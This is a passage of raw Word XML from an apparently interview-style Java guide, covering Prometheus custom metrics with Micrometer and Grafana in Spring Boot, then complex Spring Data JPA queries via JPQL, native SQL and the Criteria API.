    <w:p w14:paraId="1977007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job_name: 'spring-boot-application'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0559AC0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static_configs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C283C8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targets: ['localhost:8080']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA6567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metrics_path: '/actuator/prometheus'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E50DEA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This configuration tells Prometheus to scrape the /actuator/prometheus endpoint of your Spring Boot application running on localhost:8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F79FC44"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A10F3">
          <v:rect id="_x0000_i2871" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CF8982"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6. Visualize Metrics with Grafana (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DAFAA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If you want to visualize these metrics, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create dashboards and plots based on the Prometheus metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCF660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onnect Grafana to your Prometheus instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8A410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Create a new dashboard and query for the custom metrics like custom_metric_counter or other system-level metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EDC0F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9164B">
          <v:rect id="_x0000_i2872" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3910EDF8"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7. Complete Example of Spring Boot Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598610F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application.properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0744E33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s.web.exposure.include=health,info,prometheus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CC890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management.endpoint.prometheus.enabled=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B163D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CustomMetricsService.java</w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054F7BC9"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Counter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554C713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import io.micrometer.core.instrument.MeterRegistry;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A0F2D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lastRenderedPageBreak/>
        <w:t>import org.springframework.stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69923A50" w14:textId="77777777" w:rsidR="00686558" w:rsidRPr="00686558" w:rsidRDefault="00686558" w:rsidP="00686558">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29D3FF1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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ED914F"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public class CustomMetricsService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EC64E1" w14:textId="77777777" w:rsidR="00686558" w:rsidRPr="00686558" w:rsidRDefault="00686558" w:rsidP="00686558">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE6FC2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rivate final Counter customCounter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B636982" w14:textId="77777777" w:rsidR="00686558" w:rsidRPr="00686558" w:rsidRDefault="00686558" w:rsidP="00686558">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD3932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CustomMetricsService(MeterRegistry meterRegistry) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C1A4A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Create a custom counter metric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D7425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this.customCounter = meterRegistry.counter("custom_metric_counter", "type", "example");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0218ADA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07CA4299" w14:textId="77777777" w:rsidR="00686558" w:rsidRPr="00686558" w:rsidRDefault="00686558" w:rsidP="00686558">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7569AF2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public void incrementCustomCounter() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7270D47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Increment the custom counter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9355B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customCounter.increment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484BEC6D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B9EC30"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA6B81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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus scrape configuration (prometheus.yml)</w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF03AB8"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scrape_configs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370976D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job_name: 'spring-boot-application'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011FFED4"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static_configs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437FC8C2"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 targets: ['localhost:8080']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184587B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    metrics_path: '/actuator/prometheus'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E74DA4A" w14:textId="77777777" w:rsidR="00686558" w:rsidRPr="00686558" w:rsidRDefault="00000000" w:rsidP="006865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8F0D2">
          <v:rect id="_x0000_i2873" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E71C0E" w14:textId="77777777" w:rsidR="00686558" w:rsidRPr="00686558" w:rsidRDefault="00686558" w:rsidP="00686558">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742C1063"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By following the steps above, you can expose custom metrics from your Spring Boot application and make them compatible with Prometheus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597D94DC"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Add the </w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Micrometer Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> registry dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C48F2B"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Enable the </w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus endpoint</w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring Boot Actuator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB536E5"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Create </w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>custom metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., counters, gauges) using </w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MeterRegistry</w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F07B39A"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Configure </w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to scrape your application’s metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2581EE91"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 xml:space="preserve">Optionally, visualize these metrics in </w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A9FF6E" w14:textId="77777777" w:rsidR="00686558" w:rsidRPr="00686558" w:rsidRDefault="00686558" w:rsidP="00686558">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>With this setup, you can effectively monitor your Spring Boot application and expose custom metrics for Prometheus scraping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C58247"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141D21">
          <v:rect id="_x0000_i2874" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61239769" w14:textId="1C60071A" w:rsidR="00187C12" w:rsidRPr="00CE4B95" w:rsidRDefault="00414D65" w:rsidP="00187C12">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="698" w:name="_Toc197867912"/>
      <w:r w:rsidRPr="00414D65">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you handle complex queries efficiently with Spring Data JPA beyond simple CRUD or pagination</w:t>
      </w:r>
      <w:r w:rsidR="00187C12" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="698"/>
    </w:p>
    <w:p w14:paraId="0E891813" w14:textId="4597BDBF" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00FA6506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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When dealing with </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>complex queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, beyond simple CRUD or pagination, you can leverage various techniques to optimize and handle advanced query requirements efficiently. Here are several ways to efficiently manage complex queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6D3ACA"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1. Custom Queries with JPQL (Java Persistence Query Language)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45751F7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JPQL allows you to define custom queries directly in your repository methods using annotations like @Query. This is useful when your query requires more complex operations than just basic CRUD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3944E80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23863F8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04079A8" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00C62B87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74880AC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 Custom JPQL Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2212721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 e FROM Employee e WHERE e.department = :department AND e.salary &gt; :salary")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B0020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gt; findEmployeesByDepartmentAndSalary(@Param("department") String department, @Param("salary") Double salary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534A6AF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8F61D7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JPQL is similar to SQL but works with entity names and their properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D5E7C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You can also use dynamic queries by combining @Query with parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D298CF1"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C5D5">
          <v:rect id="_x0000_i2875" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E10D69D"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2. Native Queries for SQL Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07060F7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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sometimes, JPQL is not enough, especially when you need to use complex SQL features like window functions, joins, or database-specific operations. In these cases, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>native SQL queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> via @Query(nativeQuery = true).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8B23B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0AE4F54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0CA24C35" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00C62B87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4952558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 Native SQL Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A933A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value = "SELECT * FROM employees e WHERE e.department = :department AND e.salary &gt; :salary", nativeQuery = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542F6C4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gt; findEmployeesByDepartmentAndSalaryNative(@Param("department") String department, @Param("salary") Double salary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5AAFB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441324D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Native queries give you full control over SQL and are useful when you need specific database features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D784802"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F423B7">
          <v:rect id="_x0000_i2876" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6F45A5"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3. Criteria API for Type-Safe Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CFD1B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w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Criteria API</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides a more flexible and type-safe way to build complex queries programmatically. This is useful for constructing dynamic queries where conditions may change based on user input or application logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AE10C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34C7A42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mport javax.persistence.criteria.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F2170E" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00C62B87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="076B639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List&lt;Employee&gt; findEmployeesByCriteria(String department, Double salary) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD8096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CriteriaBuilder cb = entityManager.getCriteriaBuilder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ED3F5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CriteriaQuery&lt;Employee&gt; query = cb.createQuery(Employee.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA473D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oot&lt;Employee&gt; root = query.from(Employee.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FC69D3" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00C62B87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6874AD6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Predicate&gt; predicates = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2C2107" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00C62B87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFBEBA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department != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8B2A0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redicates.add(cb.equal(root.get("department"), department));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED8EEC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334DB2E5" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00C62B87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D4CA2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salary != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5C985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redicates.add(cb.greaterThan(root.get("salary"), salary));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374CBE03"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1622375C" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00C62B87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39B275B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root).where(predicates.toArray(new Predicate[0]));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5B27F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entityManager.createQuery(query).getResultList();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A197FA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1F422D3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Criteria API is powerful for </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dynamic query construction</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> but can be verbose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CD55C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t's type-safe, meaning it uses the entity's Java types and avoids potential errors from using raw SQL or JPQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086048A7"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B0B2F">
          <v:rect id="_x0000_i2877" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CFD939"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4. Specification API for Reusable Query Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CD668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Spring Data JPA provides the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
